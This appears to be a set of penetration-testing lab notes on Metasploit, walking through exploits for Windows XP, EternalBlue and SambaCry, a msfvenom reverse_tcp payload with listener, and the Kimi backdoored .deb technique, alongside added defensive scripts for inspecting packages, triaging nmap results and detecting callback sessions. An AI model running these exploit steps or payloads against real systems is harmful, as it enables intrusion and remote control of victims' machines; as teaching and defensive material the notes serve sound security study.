Introduction of Metasploit Framework

Metasploit Framework is a powerful open-source penetration testing platform that enables security professionals to identify and exploit vulnerabilities in computer systems. It provides a comprehensive suite of tools and resources for assessing and securing networks, making it a valuable asset in ethical hacking and cybersecurity assessments.
Console Based Exploitation 1  —> Windows XP SP 0
Console Based Exploitation 2  —> Windows XP SP 2
Kimi Framework
Terminologies
=============
1. Vulnerabilities
2. Exploit
3. Payload
4. Backdoor
5. Covering Traces
Terms
=====
RHOST –> Remote Host —> Target’s IP Address
RPORT –> Remote Port –> The port number of target machine on which a vulnerable service is running
LHOST –> Listening Host –> Attacker’s IP Address
LPORT –> Listening Port –> The port number on which an attacker is listening

EXPLOIT - 1 in Metasploit Framework
-----------------------------------
Requirements
XP Service Pack 0
Kali Linux -> Updates
Metasploit Framework
Steps:
------
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
search dcom
5. use <path of the above exploit>
6. show info –> information of the exploit
7. show options –> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit

EXPLOIT - 2 in Metasploit Framework
-----------------------------------
Requirements
XP Service Pack 2
Kali Linux -> Updates
Metasploit Framework
Steps:
------
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
search ms08-067/netapi
5. use <path of the above exploit>
6. show info –> information of the exploit
7. show options –> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit
KiMi Framework
==============
It is a framework for exploiting Linux-based OS. It is named after a character from Naruto -> Kimimaro. In this framework, we create a malicious file with the extension .deb -> the Debian package extension. We ask the target to install that Debian package; as soon as the target installs it, we receive a Meterpreter session.
We need to download this framework from GitHub:
https://github.com/ChaitanyaHaritash/kimi
Clone or copy -> click
Copy the link
Open the Linux terminal and type
#git clone https://github.com/ChaitanyaHaritash/kimi.git
#cd kimi
#python kimi.py -h   -> help page
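The Kimi approach above depends on the target running `dpkg -i` on a package whose install-time scripts do the attacker's work. The defensive counterpart is to look inside a .deb before installing it. The following is an added example, not code from the Kimi project or from these notes: it implements a minimal reader for the `ar` container that every .deb uses, unpacks the `control.tar.*` member and lists the maintainer scripts (`preinst`, `postinst`, `prerm`, `postrm`), which dpkg runs as root. The sample package it inspects is constructed in memory with a harmless `postinst` so the script runs offline; `build_sample_deb` and the field layout are this example's own.

```python
"""Inspect a .deb before installing it: list its maintainer scripts.

Added example (not part of the Kimi project or the original notes).
A Debian package is an 'ar' archive holding debian-binary, control.tar.*
and data.tar.*. Anything in control.tar's preinst/postinst/prerm/postrm
runs as root during dpkg -i, which is what a package built to hand back a
session relies on. The sample package below is constructed in memory.
"""
import io
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}


def _ar_member(name, data):
    """Build one ar member: 60-byte header + body, padded to 2-byte alignment."""
    header = (name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
              + "100644".ljust(8) + str(len(data)).ljust(10) + "`\n").encode()
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def _tar_bytes(files):
    """Create a gzip-compressed tar archive from {name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            info.mode = 0o755
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb():
    """Constructed sample .deb: a control file plus a harmless postinst."""
    control = _tar_bytes({
        "./control": b"Package: sample\nVersion: 1.0\nArchitecture: all\n"
                     b"Maintainer: sample\nDescription: constructed sample\n",
        "./postinst": b"#!/bin/sh\necho 'postinst ran'\n",
    })
    data = _tar_bytes({"./usr/share/doc/sample/README": b"hello\n"})
    return (AR_MAGIC + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control)
            + _ar_member("data.tar.gz", data))


def ar_members(blob):
    """Yield (name, bytes) for each member of an ar archive."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar member header")
        name = hdr[0:16].decode().strip().rstrip("/")   # GNU ar appends '/'
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                    # members are 2-byte aligned


def maintainer_scripts(deb_bytes):
    """Return {script_name: script_text} for every maintainer script in the .deb."""
    found = {}
    for name, body in ar_members(deb_bytes):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(body), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.lstrip("./").split("/")[-1]
                if base in MAINTAINER_SCRIPTS and member.isfile():
                    found[base] = tar.extractfile(member).read().decode(errors="replace")
    return found


if __name__ == "__main__":
    scripts = maintainer_scripts(build_sample_deb())
    for script_name, text in scripts.items():
        print(f"--- {script_name} ---\n{text}")
    print("review the scripts above before dpkg -i" if scripts else "no maintainer scripts")
```

Point `maintainer_scripts` at the bytes of a real package (`open(path, "rb").read()`) to see what would run at install time; an unexpected network client or a base64 blob inside `postinst` is the thing to look for before a package like this is installed on a host.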
https://www.offensive-security.com/metasploit-unleashed/
Netapi32.dll is a module that contains the Windows NET API, used by applications to access a Microsoft network. netapi32.dll is a system component needed for the PC to work properly and should not be removed. The version of netapi32.dll shipped with Windows XP SP2 is vulnerable and allows a remote attacker to gain remote access to the machine.
DCOM (Distributed Component Object Model) is a protocol that enables software components to communicate directly over a network. It runs by default on Windows XP SP0-SP1 and Windows 2000 Server.
Console Based Exploitation 3
Windows 7 –> Eternal Blue
Samba Cry –> Eternal Red
Application Based Exploitation
Payload Based Exploitation
Post Exploitation -> Local Privilege Escalation
GUI Based Exploitation –> Armitage
Console Based Exploitation 3
—————————-
Eternal Blue –> NSA Exploit leaked by Shadow Brokers
EternalBlue-Double Pulsar
dll -> Dynamic Link Library file
Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
Shadow Brokers —> Fuzzbunch.py
Empire –> MSF of NSA
Metasploit Module

Steps in Metasploit Framework
=============================
Open a terminal
1. #arp-scan --local
Target IP Address –> 192.168.228.138
2. #nmap 192.168.228.138
3. #nmap -sS -sC -sV 192.168.228.138
4. #nmap 192.168.228.138 --script vuln
CVE-2017-0143
Open another terminal, start metasploit framework
5. #msfconsole
6. #search CVE-2017-0143
7. #use auxiliary/scanner/smb/smb_ms17_010
8. #options
9. #set rhosts 192.168.228.138
10. #options
11. #run
Host is vulnerable to the exploit
12. #use exploit/windows/smb/ms17_010_eternalblue
13. #show options
14. #set rhost 192.168.228.138
15. #options
16. #exploit
C:/Windows/System32> -> I got access to the command prompt
For Changing the payload
set payload windows/meterpreter/reverse_tcp

Samba Cry - Eternal Red Metasploit Framework
============================================
It is a vulnerability in Linux-based OS. SMBv2.
NSA exploit leaked by Shadow Brokers.
Open a terminal
1. #arp-scan --local
Target IP Address –> 192.168.228.151
2. #nmap 192.168.228.151
3. #nmap -sS -sC -sV 192.168.228.151
4. #nmap 192.168.228.151 --script vuln
Open another terminal, start metasploit framework
5. #search is_known_pipename
6. #search cve-2017-7494
exploit/linux/samba/is_known_pipename
7. #use exploit/linux/samba/is_known_pipename
8. #info
9. #options
10. #set rhost 192.168.228.151
11. #run
This will give me a raw shell -> Bash shell
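Each of the scan procedures in these notes (the `nmap` steps of Exploit 1 and 2, the EternalBlue steps and the SambaCry steps above) ends with reading `nmap --script vuln` output off the screen. The same output written with `-oX` can be turned into a remediation list. The block below is an added example, not code from these notes or from nmap: it parses nmap's XML, collects every `smb-vuln-*` host-script result with its CVE key and reported state, and returns the hosts that still need patching. The XML is a constructed sample in the shape nmap's `vulns` library emits, using the two target addresses from the notes; the helper names are this example's own.

```python
"""Triage nmap --script vuln XML for the SMB checks used in these notes.

Added example, not part of the original notes or of nmap. Parses
nmap -oX output and lists, per host, each smb-vuln-* NSE result with the
CVE key and its state, so scan results become a patch list rather than
something read off the terminal. SAMPLE_XML is a constructed sample.
"""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output, trimmed to the elements used below.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.228.138" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms08-067" output="NOT VULNERABLE">
        <table key="CVE-2008-4250">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="192.168.228.151" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-cve-2017-7494" output="LIKELY VULNERABLE">
        <table key="CVE-2017-7494">
          <elem key="state">LIKELY VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_smb_vuln_results(xml_text):
    """Return (host_ip, script_id, cve, state) for every smb-vuln-* result."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for script in host.iter("script"):
            script_id = script.get("id", "")
            if not script_id.startswith("smb-vuln-"):
                continue
            for table in script.findall("table"):
                cve = table.get("key", "")
                # nmap's vulns library reports e.g. VULNERABLE, LIKELY VULNERABLE, NOT VULNERABLE
                state = table.findtext("elem[@key='state']", default="UNKNOWN")
                findings.append((ip, script_id, cve, state))
    return findings


def hosts_needing_patch(findings):
    """Hosts with at least one VULNERABLE or LIKELY VULNERABLE result."""
    return sorted({ip for ip, _, _, state in findings
                   if "VULNERABLE" in state and not state.startswith("NOT")})


if __name__ == "__main__":
    results = parse_smb_vuln_results(SAMPLE_XML)
    for ip, script_id, cve, state in results:
        print(f"{ip:16} {script_id:26} {cve:15} {state}")
    print("needs patching:", ", ".join(hosts_needing_patch(results)))
```

Feed it a real file with `parse_smb_vuln_results(open("scan.xml").read())`; the `state` filter is deliberately conservative, so a host reported as `LIKELY VULNERABLE` is kept on the list until it is confirmed patched.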

Application Based Exploitation Metasploit Framework
===================================================
Open the terminal, start with msfconsole
1. #msfconsole
2. #search payload/windows/meterpreter
payload/windows/meterpreter/reverse_tcp –> use
payload/windows/meterpreter_reverse_tcp
payload/windows/meterpreter/reverse_http
Open Another Terminal, for creating a payload – stub
3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
-p –> selecting the payload
windows/meterpreter/reverse_tcp –> is the payload
lhost –> attacker’s IP Address
lport –> Listening attacker’s port
-f –> file format
exe –> executable file
> –> destination of the output
/root/Desktop/prasheel.exe –> is the output file
Go back to the first terminal and set up the listener (handler) for the payload
4. #use exploit/multi/handler
5. #show options
6. #set payload windows/meterpreter/reverse_tcp
7. #show options
8. #set lport 8989
9. #set lhost 192.168.0.25
10. #exploit
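The handler configured above waits on LHOST:LPORT (192.168.0.25:8989 in the notes) for the payload to connect back, so on the network the compromised Windows host opens an outbound TCP session to an unusual port and keeps it open. The block below is an added example, not part of these notes or of Metasploit: it reads Zeek `conn.log` records and flags sessions that fit that shape. The log lines are a constructed sample using a reduced set of Zeek's tab-separated fields; the monitored range, the allowlist of expected ports and the duration threshold are assumptions to tune for a given environment.

```python
"""Flag reverse-connection style sessions in Zeek conn.log records.

Added example (not part of the original notes or of Metasploit). A
Meterpreter reverse_tcp payload connects from the victim out to the
handler on LHOST:LPORT and holds the session open, so we look for
originators inside the monitored range talking to a port outside the
expected set, with no service identified and a long duration.
SAMPLE_CONN_LOG is constructed; thresholds below are assumptions.
"""
import ipaddress

# Reduced field set, in the order Zeek's conn.log #fields header lists them.
FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
          "proto", "service", "duration", "orig_bytes", "resp_bytes", "conn_state"]

# Constructed sample: a short HTTP request, a long-lived session to 8989 with
# no recognised service, an SMB session, and a rejected attempt to 8989.
SAMPLE_CONN_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state
1700000000.100000\tCk1\t192.168.0.40\t52011\t93.184.216.34\t80\ttcp\thttp\t0.412\t350\t1200\tSF
1700000001.500000\tCk2\t192.168.0.40\t52020\t192.168.0.25\t8989\ttcp\t-\t1843.702\t5120\t91220\tS1
1700000002.000000\tCk3\t192.168.0.41\t52033\t192.168.0.10\t445\ttcp\t-\t2.100\t900\t3000\tSF
1700000003.000000\tCk4\t192.168.0.40\t52040\t192.168.0.25\t8989\ttcp\t-\t0.015\t0\t0\tREJ
"""

MONITORED = ipaddress.ip_network("192.168.0.0/24")        # assumption: the workstation LAN
EXPECTED_PORTS = {22, 25, 53, 80, 88, 135, 139, 389, 443, 445, 3389}  # assumption
MIN_DURATION = 300.0                                       # seconds; assumption


def parse_conn_log(text):
    """Parse tab-separated conn.log lines into dicts, skipping '#' header lines."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue
        rows.append(dict(zip(FIELDS, parts)))
    return rows


def _as_float(value):
    """Zeek writes '-' for unset numeric fields."""
    return float(value) if value not in ("-", "") else 0.0


def suspicious_callbacks(rows):
    """Return the uids of sessions that look like an outbound callback to a handler."""
    hits = []
    for row in rows:
        orig = ipaddress.ip_address(row["id.orig_h"])
        resp_port = int(row["id.resp_p"])
        if orig not in MONITORED or row["proto"] != "tcp":
            continue
        if resp_port in EXPECTED_PORTS or row["service"] != "-":
            continue                       # known service on a known port
        if _as_float(row["duration"]) < MIN_DURATION:
            continue                       # short probes are noise here
        hits.append(row["uid"])
    return hits


if __name__ == "__main__":
    for uid in suspicious_callbacks(parse_conn_log(SAMPLE_CONN_LOG)):
        print("review session", uid)
```

On the sample only the long session to 192.168.0.25:8989 is reported; the rejected attempt to the same port and the SMB session to a known port are ignored. In practice the hit list is a starting point for looking at the originating host's process that owns the socket.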
Armitage –> GUI Based Exploitation
Graphical Version of Metasploit Framework
